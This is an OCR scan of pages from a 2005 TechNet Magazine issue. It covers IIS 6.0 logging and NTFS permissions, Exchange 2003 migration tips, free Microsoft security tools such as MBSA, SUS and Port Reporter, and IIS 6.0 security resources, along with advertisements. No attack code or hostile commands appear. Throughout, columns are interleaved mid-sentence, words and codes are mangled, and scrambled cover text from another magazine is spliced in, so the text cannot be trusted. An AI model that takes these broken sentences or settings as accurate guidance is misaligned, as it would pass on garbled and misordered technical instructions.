| _ when requests are rejected by the http.sys. 
_ Http.sys, which hands off requests to IIS 
_ 6.0 applications, won't take requests that do 
' not meet specific criteria. Client requests 
_ for content must be well-formed HTTP 1.1, 
_ meet size constraints, not have any high- © 
_ order bit characters, and not violate other 
well-defined rules (see support.microsoft.com/ 
_ id=820129 for information on configurable — 
parameters). An attacker will almost cer- 
_ tainly leave tracks in this log, so be sure to 
_ include a review of the httperr logs located 
at \system32\logfiles\httperr in your regu- 
_ lar monitoring tasks. 


IIS 6.0 and NTFS 
_ Permissions 
Wouldnt it be nice if you had quick way — 


6.0, the wwwroot folder has tighter permis- 


_ sions than with previous versions of IIS, 


Your wish is granted! The IIS W3SVC and you may need to make some modifica- 


_ when you don't use the \inetpub\wwwroot 
| folder for content. There is a new group in 
_ IIS 6.0 called the IIS_WPG that will re- 
_ quire at least read access to your entire site’s 
- content when you run ASP.NET applica- 


tions. Failure to do so will result in the re- 
turn of an ASP.NET error message similar 


to the following: 


Exception Details: 
System.UnauthorizedAccessException: Access to 
the path "D:\data\txtinv.txt" is denied. 


ASP.NET is not authorized to access the 
requested resource.. 


_ Allowing the IIS_WPG access to the all 
your Web content will avoid this and other 
- related problems. 

Many IIS servers store content in and un- Wrap Up 
_ der the \inetpub\wwwroot folder. With IIS — 
sage is returned because the file is actually . 


Of course, this ism’t a complete review, 


_ but these issues are at the top of the list of 
' new security-related tasks for administer- 
' ing IIS 6.0. would be remiss without men- 


If you’re like me, when I first opened 
the IIS 6.0 user interface, | was surprised 
at how familiar it was. 


cations working effectively. 
For example, the IIS anonymous user ac- 


You might need to modify this permission 


- for certain scripts to work that need write 
_ permission for Web Forms or for other ap- 
_ plications that write to the files in the con- 
tents of the sc-status field for 404 error and _ 
the sc-sub-status fields for Error 404.1 | 
and 404.2 would quickly identify the prob- 


text of the anonymous user. 
Another more common problem arises 


' tioning that you should always keep your 
- server(s) fully patched (make sure you visit 
_ Windows’ Update frequently) and that you 
- should continue to monitor for unusual ac- 
_ tivity. Don’t forget to check out the afore- 
- mentioned Log Parser tool, as it will make 
your IIS-related tasks easier. Also, keep an 
eye out for other new and exciting tools to 
_ assist with keeping your IIS servers run- 
' ning smoothly and securely. ® 


The following list details the sub-status codes thet were ndded for trouble- 
shooting specific situations: ae 


401.7 

403.20 
404.4 
404.2 

500.46 
500.17 
500.18 
500.19 
500.20 


Passport login failure 


Bad file: metadata. 


URLAuthZ denied due to policy 


Denied due to MIME ‘policy - 

Denied due to lockdown policy 

UNC Username/Password incorrect 
URLAuthz store not found 

URLAuthz store cannot be opened S 


URLAuthZ scope not found 


Winter 2005 


S8PO4 10119 SN}e1S-qns 


93 


May 2004 - Volume 13 


Number 5 


the journal for UNIX and Linux 
systems administrators 


Using LDAP to Manage UNIX 
Accounts ket s-6 


Configuring Linux for LDAP Name 
Service and Authentication 
ni DEme = 10 


The OpenLDAP Proxy Server 
Rashard E Vog 1” 
Remotely Monitoring Files with PHP 
Russet LT Dyor + 29 


‘Secure File Transter with chroot'ed 
SFTP-Only Accounts » Rapn Dunes « 26 


Using Screen 


— Tools tor Simultancous 
of Multiple Systems 


April 2004 - Volume 13 Number 4 


DHCP Jumpstart 
7 


jects. 


S¥Stems adalnistrators 


Ind Answers + Any For - 54 


the journat un F. $ t Ora g e 


pystems Administration: 
if rapping up Python 


| 


m Monitoring 


Monitoring ana nay 
Software RAID 


naging Linux 


4 mag.com 


ot Disk Mirror 
ot Disk Mirco ing With Linux 


es = HOEK! Dissecting ara 
IPCop, Dovecot, Python, and Squid = ssl 


Integrating the 
a Ne 
Monitoring Moget 


February 2004 - Vol 


i 
:Admin. Network 


the Journal for UNIX and Linux Ss ecur j t y 


systems administrators 


13» Number 2 


rkin Pine 


2 


Py 


thon in Syst 

P; 7 in Systems Administeation: 

oon vs a Python Networking alot 
+ ar 


Securing Intranets with IPCop The Software By 
Pra bicnee asd enn Sate Wer ae Gas PAPESS Hom Sun 
Instaiting Dovecot: A Secure IMAP Questions and Answers 
Server + ce Teo = 14 
Firewalling HTTP Traffic Using 
Reverse Squid Proxy 
fuschia A 
www, 
Python in Systems Administration: 
Part ill — Pexpect Automates 
1o-Solve Problems 

. 


{ntroduction to Pian 9 
dt Jov W 29 


Tracking System Chi 
Inventory Scripts 


IPQOS - Fete Baer Baton + 99 


Questions & Answers - Amy ftcn + 55 


Nh I www.sysadminmag.com 


Jenna Lyday 


15 Tips for a Smooth Migration to Exchange Server 2003 


ROUND 


If you've heard that it’s difficult to migrate from Exchange 
5.5 to Exchange Server 2003, don’t worry—there are 
steps you can take to simplify the upgrade process. 
While the list that follows does not represent an 
exhaustive Exchange deployment plan, it does represent 
the situations we often see in customer environments that 
adversely affect the deployment process. 


Use the Microsoft” Exchange Server Deployment Tools. These are new in the 
2003 release of Exchange Server, and will greatly help in guiding you through a 
successful deployment process. Included is an array of tools designed to diag- 
nose and/or verify a wide variety of conditions that you might encounter. 


Keep in mind that Exchange Server 2003 makes widespread use of DNS in all its 
sundry forms. Because Exchange is a major consumer of DNS, it will quickly and 
effectively expose any related issues. Steps 3 through 8 will help you ensure DNS is ready 
before installing Exchange Server. (For more about DNS, see the How IT Works column 


by Regis Donovan in this issue.) 


Confirm that your Mail Exchange 
(MX) records are pointing to the cor- 
rect server or IP address. 


Verify that your DNS server is con 


it is unable to resolve internally, instead of 
being pointed directly to an external DNS 
resolver. This is a good rule in general. 


Check that your local member serv- 

ers are pointed to your local DNS 
server and not to an external resolver. The 
trick here is that you want to be able to find 
the other machines on your LAN and not 
just machines on the Internet. 


Certify that the Domain Control- 


master is using a DNS server that 
is accessible by your local serv- 


~ ers. If the schema master is the DNS server, 
figured to use forwarders for addresses _ 


make sure that it is configured to use its 


_ own IP address for DNS and is the pre- 


ferred DNS server of the member servers. 


Confirm on the first page of Proper- 
ties on the zone that your DNS server 
is configured to Allow Dynamic Update. 


8 Verify that your DNS records contain 
entries under the domain, labeled 
_medes, _sites,_tcp, and _udp, in addition 


ler (DC) acting as your schema ' cluster is the Site Replication Service (SRS), 


to the Host records. If you do not see these 
entries and have already verified that Dy- 
namic Update is enabled, go to your DCs 
and type “net stop netlogon” followed by 
“net start netlogon” from a command 
prompt. This will restart the Netlogon ser- 
vice and cause the DC to reregister its ser- 
vice resource records (SRV records). 


Verify that you can resolve the 
name of your mail server and 
your DC(s) by both short 
name and Fully Qualified 
Domain Name (FQDN). 


1 Ensure that the first Exchange 

2003 server that you install is nota 
cluster if your current e-mail environment 
contains Exchange 5.5 and no subsequent 
Exchange versions. Some Exchange services 
are supported on a cluster, but some are 
not. One of the services not supported ona 


which allows Exchange 2003 and Exchange 
5.5 to be on speaking terms. It’s important 
that the first server that goes in is able to 
create the SRS and start communications. 


1 Install the Active Directory’ Con- 

nector (ADC) and configure Con- 
nection Agreements (CAs) if your Ex- 
change organization is Exchange 5.5. I 
strongly recommend that you use the ADC 
Tools, included with your ADC installation, 
to generate these CAs. 


1 Check that all ADC servers are up- 
graded to the proper Exchange 2003 
version before you embark on your Ex- 


Jenna Lyday is a Software Test Engineer on the Microsoft Exchange team, where she has been testing Exchange deployments for ; ; 
the last four years. Previously, she was an Exchange administrator. ' change 2003 rollout if you are upgrading 


www.technetmagazine.com Winter 2005 95 


from Exchange 2000 mixed mode. I also — 


strongly recommend that after upgrading 


your ADC servers you use the ADC Tools 


to revalidate any existing CAs. 


_) Remember that if you have third- 


an existing Exchange deployment, uninstall 
your third-party applications prior to the 
upgrade and reinstall the new version after 
the upgrade. (Note: upgrading to Microsoft 


Exchange 2003 is supported only onan Ex- | 


change 2000 server.) 


oq 
a 


‘| Ifyouare upgrading from Exchange 
"2000, verify that you account for ser- 
vices that are no longer supported in Ex- 
change 2003. These include: 
Microsoft Mobile Information Server 


’ party applications running on your | 
Exchange server, you should check with | 
your vendor to confirm that they have a | 
compatible version available, and acquire it 
for installation on your new Exchange | 
server. If your migration is an upgrade of | 


Instant Messaging Service 
Exchange Chat Service 

Exchange 2000 Conferencing Server 
Key Management Service 

cc:Mail connector 

MS Mail connector 


If any of these services are running on 


the Exchange server you plan to upgrade, | 


you should remove them with Exchange 


setup before you move on. If youre going to | 
_ 2003/Library/default.mspx), where you can 


need any of these services, you will need to 


keep at least one Exchange 2000 server © 
Exchange Server 2003 Messaging Sys- 


available to run the service. 


Make sure the time on | 
the server that youare in- | 


stalling on is in syne with 
the time on your DCs. If 


the time is off by more than five minutes, — 
| successful deployment process. But 


Kerberos authentication will fail and you 
wont be able to perform any operations that 


require permissions on the Active Direc- | 
to Exchange Server 2003. e 


tory. If the times are out of sync, you can 


| type“net time /set \\<DomainController>” 
' from the command prompt on the Ex- 


change server to fix it. 


Comprehensive information about 


| planning an Exchange deployment is 


available from the Exchange Server 
2003 Technical Documentation Library 
(www. microsoft.com/technet/prodtechnol/exchange/ 


find resources such as Planning an 
tem and Exchange Server 2003 De- 


ployment Guide. In addition, in the 
2003 release of Exchange Server you'll 


' find deployment tools, which will fur- 


ther help in guiding you through a 


to start, consider these 15 guidelines 
and you'll have a smoother transition 


JOIN THE INDUSTRY’S ORIGINAL AND MOST 


RESPECTED MEMBERSHIP ORGANIZATION 
BECOME A CSI MEMBER TODAY! 


CSI is the best ally you'll find, not only for the protection of your company’s information assets, 
but for your own career and professional development. 


JOIN NOW AND RECEIVE: 


¢ Monthly newsletter Computer Security ALERT 
10-page member-only newsletter focused on practical tips, solutions and 
techniques that will help you do your job better 


° Quarterly Computer Security Journal 
Industry experts discuss a wide array of information security topics 


¢ SecurCompass 


Automated standards-based security program assessment 


and design tool ($295 value) 


eq 


ESPIRIA 


e Discounts of $200 on CSI Conferences and Training 


¢ Discounts of 10-30% on CSI Publications 
Including FrontLine Awareness Newsletter and TopLine Executive Newsletter 


To join CSI and start gaining the benefits of membership, 


go to GoCSIi.com 


96 TechNet Magazine 


Cel 


COMPUTER 
SECURITY 
INSTITUTE 


{ Membership 


Kai Axford 


Six Free Microsoft Security Resources 


WATCH 


__ Microsoft Baseline Security Analyzer 


How would you like a tool that will 


help you assess some of the common | 
security misconfigurations on your | 


machines? The Microsoft® Baseline Se- 
curity Analyzer (MBSA) is for you. 


MBSA is a best practices vulnerability | 


assessment tool for the Microsoft plat- 
form. Once you install the MSI pack- 


age locally (and as long as you have | 
_ about MBSA and download it from 
scan multiple machines from just | 


admin privileges), you can use it to 


that one central location. MBSA runs 
on Windows® 2000, Windows XP, and 
Windows Server™ 2003. It can be used 
in GUI or command-line modes (for 
all you scripting gurus). It can also be 
used in conjunction with SMS. 

As of this writing, the current ver- 
sion, MBSA 1.2.1, will scan the core 
operating system and a variety of ap- 
plications (IIS, Exchange Server, SOL 
Server™, Office, BizTalk® Server, and 
Commerce Server, for example). The 
MBSA will then save these scans in a 
neat little XML report that you can 
view immediately or save for future use. 

Now you might ask, “Is this one of 
those tools that | have to be able to 
read binary to understand?” The an- 
swer is absolutely not! The reports 
generated by this tool are simple to 
read and are easily understood by an 
IT pro. It uses a few simple colored 
icons to distinguish results: green 
(looking good!), yellow (warning: this 
has the potential to be bad), red (dan- 


www.technetmagazine.com 


ger! danger! impending doom!), or 
blue (are you following the best prac- 


tice here?). Basically, if you can drive | 
' a car, you can understand this tool— 


although if you see a blue flashing 
light, it's better just to pull over and 


' not debate whether you were follow- 


ing a “best practice.” 
You can find out more information 


www. microsoft.com/technet/security/tools/ 


» mbsahome.mspx. 


Patch management. It’s a necessary 
task, but it shouldn't be a lifestyle. How 
you deploy patches in your organiza- 


out of the office by 4:00 PM. If users 
install patches in your organization, 
you might wonder if this is something 
you really want to leave in the hands of 
people who only care about e-mail, 
solitaire, and instant messenging. 

How do your users typically deploy 
their patches? They go to Windows Up- 
date and Select All, then they roll out 


to my desktop?” Almost never. They 
simply dump patch after patch onto 
their machines and reboot. If some ob- 
scure application doesn't work after- 
ward, well, they just think it’s the — 


Software Update Services with SP1 


tion directly affects your ability to get _ 


Free? Just hearing that word 


-on the radio or TV makes me 


cringe. Like you, I’m an IT pro- 
fessional. I'd be interested if 
one of the big hardware ven- 


_ dors decided to pass out free 


20,000 RPM SCSI drives along 


- with a fiber channel SAN, but 


that’s about it. 
So why in the world am | 


telling you about free stuff in 
this column? Well, because at 
Microsoft, we’ve got some 


amazing free security tools 


_and whitepapers. If you fail to 


check them out, you're going 
to kick yourself just like you 
would if you missed out on a 
free SCSI drive. | do a lot of 
presentations and webcasts, 


and I've noticed that many IT 


pros have never heard of 


_ these tools. To be honest with 

_ you, that’s a travesty. 

all 90 updates onto their desktops at 

once. Have you ever heard a user say, “I | . at 
n get it toda 

really should test this patch in a con- | pon esa gent y, and it’s a 


trolled lab setting before deploying it 


This stuff is available now, 


whole lot more valuable than 
a SCSI drive. 


Kai Axford, CISSP, MCSE-Security, has been with Microsoft for 
the past five years as a support engineer and TechNet speaker. 


He is currently serving as a Lead Security Presenter and 
| speaks to thousands of IT pros at live events. Reach Kai at 


kaiax@microsoft.com. 


Winter 2005 97 


Fanta rit ' 
if io Leth ohig! 


ee { 


t about 


FRE 


Internet orders only, shipping and handling not included 
MSDN Magazine 


sysOnt and "Microsoft® are rage, 
2 OO: } ® [ )- O Mi Co ane Mersey 
é Cn 
ww = 
st ms 


iy 
cS 


sS 7 
SS The Microsoft Journal for Developers 
SS 


: : : 


a 

oa | 

j Ju: 
s ’ a 

at | 


All 2000-2003 
Editorial Content, 
with Source Code, 
on One CD! 


also includes Complete article index for MSDN 
Magazine, MSJ, and Microsoft Internet Developer ] 


fom1986to 2003. |= |. Na, | ticle An 


eo, Plus Complete Article Index for MISDN Magazine, 
“%, MiSJ, and Microsoft Internet Developer, 1986-2003 


ORDER TODAY! 
https;//www.sdmediagroup.com/orders/orders.cgi?user_keycode=cdrom2003h 


*MSDN Magazine 2003 CD-ROM is FREE for all Internet orders placed by December 31, 2004. Shipping and handling charge of $9.95 applies for 
orders delivered within the U.S. only. Extra charges for multiple copy orders, rapid delivery, and delivery outside the U.S. will apply; exact charges will appear 
when online order is placed. CD-ROM orders placed by phone (1-800-444-4881) or mail (MSDN Magazine CD-ROM 2003, 4601 W 6th Street, Suite B, 
Lawrence, KS, 66049) are $20.00 plus $9.95 shipping and handling. Mail orders accepted for U.S. delivery only and must be accompanied by a check for 
$29.95. Credit cards are accepted on Internet and phone orders only. 


< fault of the patches, but you'll get a big 
helping of blame, too. 


(SUS), another free tool from Microsoft. 


patch deployments in your organization. 


patches, security packs, and security up- 


in your organization. 


Port Reporter 


| set the parameters regarding how and when 
_ the updating process occurs. 

Enter Software Update Services with SP1 | 
_ will be called Windows Update Services. 
Once loaded onto Windows 2000 or Win- | This new version, due out in the first half of 


dows Server 2003, it allows you to control | 


Watch for the next version of SUS, which 


2005, will give you the ability to update driv- 


' ers, noncritical patches, and so on. 
SUS will pull down from the net all critical 


Updates that do not require a reboot can 


_ be configured to be installed silently with- 
dates that are currently available. Then you | 
can selectively test and deploy those needed | 


out user interaction or notification (we all 
know we don’t want users determining 


 what’s best). Updates that do require a 

In addition, through either Group Policy | 
Objects or a client registry setting, you can 
force the Auto Update client to point only | 
to your SUS server for updates. You canalso | 


reboot will be grouped together so a single 
reboot accomplishes the task. Finally, the 
logging and reporting features will be 
greatly improved. 


We all are familiar with Windows services and TCP ports and the like. (If 
you're not, then you are probably in marketing and can stop reading. Put 
down the magazine and slowly walk away from the Network Administrator's 
office.) Tools like NetStat can tell you which ports are open on a machine, but 
did you ever wonder exactly which process is listening on what port or 
whether it was a process at all? Check out the new Port Reporter at 
support.microsoft.com/?id=837243. The tool logs TCP and UDP port activity and 
provides you with a useful logfile. 

The newly released Port Reporter Parser tool (support.microsoft.com/?id=884289) 
can help you quickly scan through these logfiles. It is a GUl-based tool 
that can scan based on IP addresses, ports, services, user accounts, host 
names, and so on. This is great for doing things like computer forensics 
and incident response or for just proving that you're right to a bunch of 


marketing people. 


Microsoft spent a lot of money get- 
ting the security message out to the 
IT pro community. In five months, 
we've reached more than 500,000 IT 
pros worldwide. We've done summits, 
roadshows, forums, briefings, web- 
casts, and eLearning. We plan on con- 
tinuing our security push well into 
next year. Be sure to check out the 
live shows, but if we miss your town 
or if you miss us while we're in town, 
then catch the security webcasts. 
There's no excuse for not getting this 
info! (Trust me—we'll have you home 
by 4:00 PM.) 

For more information on Microsoft 
security events, see www.microsoft.com/ 
seminar/events/security/default.mspx. 


$}U9Aq AyUNndaS 


www.technetmagazine.com 


Windows XP SP2 


I'm sure that by now youve already tested 
and diligently loaded Windows XP SP2 


onto all your clients. So let's move on... just 
kidding. | realize from talking with many | 
| ment via Automatic Update until April 12, 


of you in the field that many of you are still 


in the testing process (testing is good!), but | 
unfortunately you cannot sit back and not | 
deploy SP2 simply because it causes the“Sr. 
| winxppro/maintain/sp2aumng.mspx. 


Executive Golf Score Tracking Tool” to hic- 


cup. At some point, you need to get patches 
out of the lab and into production. Remem- _ 
ber, youre in a race with all those malicious | 
| more important things, like figuring out ex- 


worm and virus writers, so test and move! 


This is especially important with Windows 
XP SP2 since it offers some really amazing — 
advances in browser safety, network pro- 
' visit www.microsoft.com/technet/prodtechnol/ 


tection, memory protection, and safer e- 


mail handling,among other things. If youre 


Finally, I need to mention some of 
the excellent security guides and 
whitepapers that have been assembled 
by some of the smartest guys I know. 
These docs contain a wealth of knowl- 
edge and answers to almost every Win- 
dows-based security configuration 
question I get. The Windows XP Se- 
curity Guide contains detailed infor- 
mation on security settings in Group 
Policy (“What the heck is the differ- 
ence between Audit Account Logon 
versus Audit Logon?”), securing stan- 
dalone clients, and how to configure a 
Software Restriction Policy (“They'll 
never play solitaire again! Bwaha- 
haha!”). Not only does the Guide dis- 
cuss these things, it provides templates, 
checklists, scripts, and so on to assist 
you in rolling it out. The guide has 
been updated to include Windows XP 
SP2-related material, so go get this to- 
day! (Or send your junior admin to 
get it... they enjoy that sort of stuff.) 

The Windows Server 2003 Security 
Guide outlines best practices for con- 
figuring your domain infrastructure 
as well as specifics on setting up your 
IIS, file, print, IAS, and infrastructure 
servers. It provides a stack of templates 
and tools that pertain directly to serv- 
ers (and everyone loves servers). You 
will definitely want to get these guides! 


Windows XP and Windows Server 2003 Security 


concerned that your corpor ate customers 


| will get this through Automatic Update be- 


fore you can test it, Microsoft has actually 
provided a tool that will block SP2 deploy- 


2005. That buys you an additional six 
months of testing time! That tool is avail- 
able at www.microsoft.com/technet/prodtechnol/ 


So don't just test it, deploy it! Your users 
will thank you (which, as we all know, is a 
rare experience). You can then get back to 


actly how many 20,000 RPM SCSI drives 
you ll need to hold all of your vacation pic- 


tures. For more info on Windows XP SP2, 


winxppro/maintain/winxpsp2.mspx. 


Winter 2005 99 


FREE 


INFORMATIONWEEK MAGAZINE OFFER ~ > | 99 Value 


440,000 Business ———— 
IT Buyers read InformationWeek, co you? 


Apply now for your Free Subscription: 


- goto-; http://free.iweek.com woes 


United Business Media 


In today’s business environment, most 


organizations are using Web servers | 


to extend products and services to 
both internal and external customers. 
At the same time, attackers are in- 


creasing their relentlessness and so- | 


phistication. To enable secure Web 
infrastructures based on reliable, high- 
performance Web server platforms, 
Microsoft built IIS 6.0 from the ground 
up with a focus on security as a core 
design criterion. 

Although security is a critical topic 


in the field of information technology 
today, few IT professionals have the 
time to dig through the volume of 
information available on MSDN®, 
TechNet, the IIS Technology Center 
on Microsoft.com (www.microsoft.com/iis), 
and elsewhere. 

However, the relatively new Web 
site TryllS.com simplifies searching by 
providing a collection of valuable, se- 
curity-focused IIS 6.0 overviews and 
technical resources, summarized at 
www.tryiis.com/Security.asp. The various of- 


IIS 6.0 Security 
Phil Sherwood 


ferings range from executive and tech- 
nical webcasts, papers for both tech- 
nical and business management 
personnel, FAQs, detailed technical 
IIS 6.0 documentation, and links to 
other focused online security centers. 

The following is a sample of what's 
available on TryllS.com. 


Phil Sherwood (pts@centurytel.net) is principal of Witan Con- 
sulting, which provides technical and marketing writing, prod- 
uct and program management, and general business 
management support to both small businesses and large 
technology development companies. 


Looking for IIS resources that you can access offline from your 
Tablet PC or stuff into your pocket and reference on the subway? 


examine Window Server™ 2003 and IIS 6.0 security capabilities 
in different levels of detail. A short collection of FAQs also pro- 
vides some brief explanations of IIS components. 

Starting on the less technical side, Understanding Internet 
Information Security provides an overview of the IIS security 
model. This is a manageable introduction for those on the busi- 
ness side and can serve as a quick, high-level scan and refresher 
for the more technical types. See www.microsoft.com/ntserver/ 
techresources/webserv/iissecure.aspo—but note that the text on the page 
is a truncated version of the Word document downloadable from 
the link towards the top of the page. It's worth the time to down- 


load and print the .doc file, 19 nicely formatted pages in total, — 


about 10 of which contain the meat and potatoes of the subject. 
Also a discussion of the IIS security model (but at the code 
level and assuming the reader's substantial technical familiarity 
with IIS and Windows NT") is For Developers: Understand- 
ing IIS Security Code at msdn.microsoft.com/library/en-us/dniis/html/ 
iissecure.asp. It’s drawn from the MSDN library and amounts to 
about 10 pages of text. After dispensing with some very high- 
level questions (“Why Security Is Important,’ for example), it 
digs into more nuts-and-bolts topics such as authentication, ac- 


www.technetmagazine.com 


_ cess control and related considerations, data integrity, digital cer- 
_ tificates, and the CryptoAPI. 

A white paper, several technical papers, and a magazine article all _ 
| is Technical Overview of Windows Server 2003 Security 
| Services, published in July 2002. The table of contents appears 
on www. microsoft.com/windowsserver2003/techinfo/overview/security.mspx; the 
_ paper itself also provides an extensive collection of links. Within 
| the overview, the paper discusses the security-related Windows 
_ Server tools and processes: authentication, access control, secu- 
_ rity policy, auditing, Active Directory’ data protection, network 
data protection, public key infrastructure (PKI), and trusts. Al- 
_ though the mentions of IIS are contained on pages 4 and 5, the 
: Windows Server 2003 content that makes up the majority of the 


' Innovations in IS Security, is the online reprint of a September 
» 2002 MSDN Magazine article titled, “Innovations in Internet 


' needed, limiting port access with TCP/IP filtering, controlling 


Still more technically substantial and running close to 40 pages 


article covers the strong foundation on which IIS is built. 
To round out the offerings, a technical paper, “For Developers: 


Information Services Let You Tightly Guard Secure Data and 
Server Processes” and amounts to about eight hard copy pages. It 
covers the use of IS Lockdown to shut down services when 


file serving with extension mapping, new developments in SSL, 
the use of URLScan, and more. See msdn.microsoft.com/msdnmag/is- 


- sues/02/09/securityiniis60. 


Winter 2005 101 


a 
Wn 
© 
1S) 
2 
o 
= 


Customer responses to Microsoft-sponsored webcasts have been 
very positive. While gaining access to these webcasts requires a 
couple of brief steps, these online seminars are worth the few mo- 
ments spent logging in. Most webcasts range between 70 and 100 
minutes in length and between 8.5 and 13MB in download size. 

One of the many webcasts available is Microsoft Executive 
Circle Webcast: Advanced Web Server Security with IIS 
6.0 and Windows Server 2003, by IIS Security Program Man- 
ager Vikas Malhotra and IIS MVP Brett Hill, introduced by IIS 
Product Manager Mary Alice Colvin. Relevant for business and 
technical personnel, it explains how security improvements in both 
IIS 6.0 and Windows Server 2003 enable deployment of secure 
Web servers and reduce costs. See msevents.microsoft.com/cui/Eventde- 
tail.aspx?EventID=1032240294. 

Other webcasts dig further into technical detail about IIS 6.0 
security features. Starting with a bit of history, Securing IIS 6.0 
(presented by Malhotra; about 70 minutes long) covers previous 
IIS architectures and then reviews the security architecture rebuilt 
for IIS 6.0, which is locked down by default. It explains how new 
features, such as fault-tolerant process isolation, help protect against 
intrusions. See ww.microsoft.com/usa/webcasts/ondemand/2103.asp. 

Effectively Using IIS Security (Malhotra; 90 minutes) pro- 
vides an overview of the big picture by reviewing the new IIS 6.0 
security architecture before it explores the underlying security prin- 
ciples of IIS 6.0. It also illustrates how the new security features 
help protect Web servers against hackers. A 7.3MB PDF slide deck, 
downloadable separately, accompanies this presentation. See 
msevents.microsoft.com/CUI/EventDetail.aspx? EventID=1032241468. 

Authentication protocols are the focus of The Ins and Outs of 
Authentication in HIS 4.0, 5.0, and 6.0—Level 200 (Chris 
Adams, IIS supportability lead; 85 minutes). This presentation 
addresses ways to secure IIS servers with good authentication 
schemes, a critical part of establishing server security, by explain- 
ing how anonymous, basic, and other authentication methods 
work. See www.microsoft.com/usa/webcasts/ondemand/2100.asp. 

If youre considering migrating to IIS 6.0 from the 4.0 or 5.0 
releases you will want to watch The Inside Scoop: The Good, 
the Bad, and the Ugly of IIS 5.0 Isolation Mode in IIS 6.0 
(Level 300) (Chris Adams, IIS supportability lead; 82 minutes). 
The presentation focuses on determining which applications imple- 
mented on earlier releases of IIS are well suited for immediate 
migration to IIS 6.0, with its new worker process isolation mode, 
and which are candidates for running in IIS 5.0 Isolation Mode 
temporarily while they're updated to take advantage of the new 
architecture of IIS 6.0. The pitfalls and costs of using IIS 5.0 Isola- 
tion Mode on Windows Server 2003 are also discussed. See www.micro- 
soft.com/usa/webcasts/ondemand/2279.asp. 

Windows and Exchange administrators and others who have to 
ensure secure data transmission between clients and Windows and 
Exchange servers form the primary audience for Troubleshoot- 
ing Secure Socket Layer (Adams; 90 minutes). This presenta- 
tion discusses SSL on each supported IIS platform and also lays 
out some tips and tricks that simplify troubleshooting. See 
www.microsoft.com/usa/webcasts/ondemand/2099.asp. 


TechNet Magazine 


Online Security Centers 


Expanding beyond the very specific technical documentation 
are the two different online security centers included on the 
TrylIS.com Web site (www.tryiis.com/Security.asp). The first is the On- 
line HS Security Center (www.microsoft.com/technet/security/prodtech/ 
iis/default.mspx), which provides the latest security updates, trouble- 
shooting advice, configuration and administration guidance, and 
in-depth information on specific security topics for all versions of 
IIS Web servers. 

Starting at the In-depth Guidance for Securing Computer 
Systems heading at the IIS Security Center, traversing a few 
linked pages, and then scanning for IIS reveals the following three 


- items of interest. 


® Checklists for configuring the Active Directory IIS server or- 
ganizational unit structure as well as for hardening the IIS 
server: www.microsoft.com/technet/security/guidance/secmod216.mspx 
@ A detailed guide to hardening an IIS server, complete with 
follow up technical references: 
www. microsoft.com/technet/security/guidance/secmod124.mspx 
® Detailed explanations and step-by-step instructions for run- 
ning IIS Lockdown: 
msdn.microsoft.com/library/en-us/secmod/html/secmod113.asp 
The second recommended site is the Online Microsoft Secu- 
rity Center (www.microsoft.com/security). While this site is not specifi- 
cally an IIS 6.0 resource, it does provide a handy central location to 
keep current on recent viruses, hack attempts, and other security 
incidents as well as security bulletins, updates, and corporate-level 
security information. 


The e-Business Foundation Winner 


The in-depth emphasis on security in IIS 6.0 might take the 
surprise out of learning that IIS 6.0 isan eWEEK award winner. In 
April 2004, eWEEK, a prominent e-business, communications, 
and Internet-based architecture newsletter, acknowledged the new 
strength and security of Windows Server 2003 and IIS 6.0. It de- 


clared the pair as the winner in the Best e-Business Foundation — 


category, based “on the strength of the components it combines for 
building an organization’s basic IT infrastructure.” 

The award also singled out the improved security features:“Chief 
among those was the move to the all-new IIS (Internet Informa- 


tion Services) 6.0 Web server, which is faster, more reliable and | 


more secure than the previous version of IIS. What's more, IIS 6.0 
is not installed by default in Windows Server 2003, which reduces 
unnecessary exposure. In addition, IIS 6.0 is better suited than its 
predecessor as a development platform target.’ (Source: 
www.eweek.com/article2/0,1759,1559921,00.asp) 

To look past industry awards, visit the security page on the 
TrylIS.com Web site (www.tryiis.com/Security.asp) to discover the re- 
sources described here, and more. The site lays out in both sum- 
mary form and technical detail the elements that make Windows 
Server 2003 and IIS 6.0 meet business and organizational needs 
for a secure, high-performance Web infrastructure. 


Micresoft TechNet} bt [) AT E 


New Benefits Deliver More Value to TechNet Plus Subscribers! 


Microsoft is committed to delivering a comprehensive, centralized set of resources to help 
you solve technical problems, plan and deploy Microsoft technologies, and build your skills. 
To support this, the Microsoft TechNet Plus 2.0 subscription will include a new set of 
groundbreaking features starting in the fall of 2004. Take a look at what's in store for TechNet 


Plus 2.0 subscribers: 
No more time-bombed software! 


Full-version software will replace time-bombed software to pro- | 


vide more flexibility to TechNet Plus 2.0 subscribers conducting 
' service allows you to tap the vast pool of knowledge and experi- 
' ence Microsoft support professionals have to offer. You can browse 


evaluations. This enhancement supplies you with a cost-effective 
solution for trying the latest Microsoft technologies. 


TechNet Plus 2.0 subscribers receive beta software automati- 
cally so that they can spend more time cultivating skills on up- | 
coming Microsoft products. Keeping new software skills fresh 


m™ More learning resources 


_ TechNet subscriptions will include even more resources to help 
Enhanced technical support options 
TechNet Plus 2.0 provides a range of support choices to help | 


solve technical problems fast. The improved TechNet support _ 
_ search through a library of online books, TechNet Plus 2.0 pro- 


and up to date gives you a competitive advantage when youre 
creating cutting-edge solutions. 


offering has been developed in response to customer feedback, 


highlighting the Microsoft commitment to addressing customer 
needs. New TechNet Plus 2.0 subscriber support benefits include: 
Complimentary technical support incidents to help you save | 
time resolving mission-critical issues. Two complimentary 
phone or online support incidents included with each TechNet | 
Plus 2.0 subscription deliver access to a team of world-class _ 


professionals who will help provide the best solution possible. 
Microsoft software will also be available to TechNet Plus 2.0 


dress your technical questions. 
Unlimited technical assistance in managed newsgroups. 


| TechNet Plus 2.0 subscribers will get enhanced levels of service 


in Managed Newsgroups by guaranteeing a next business day 
response in more than 90 IT-related public newsgroups. This 


other posts and exchange information with peers and members 
of the Microsoft MVP community. Or, you can even post a ques- 
tion and receive an answer tailored to your specific problem. 


you sharpen your skills and find answers to questions about 
Microsoft technologies. Whether you like to install an applica- 
tion and just start using it, tinker in a virtual lab environment, or 


vides the resources to help you hone your skills and be successful 
with Microsoft technologies. 

Updates on CD or DVD every month 
Security bulletins, updates, and hotfixes will be eines on CD 
or DVD every month to ensure you have vital security resources 
at your fingertips regardless of Web connectivity or other con- 


_ straints. This gives you the flexibility to proactively install the 
Discounted professional phone incidents for supported | 


latest fixes every month and so you rest assured that the most 


current security bulletins and updates are always available. 
subscribers to ensure that there is a resource available to ad- 


These new benefits will be available beginning in November 


' 2004. For more information on the TechNet subscription, visit 
' www.microsoft.com/technet/subscriptions. 


Continued from page 104 
through. Itis tricky to completely avoid hav- 


ing an installation document, and if you — 


have a complex system, guess what? The 


deployment will still be complex. We have — 
found time and time again though that the — 
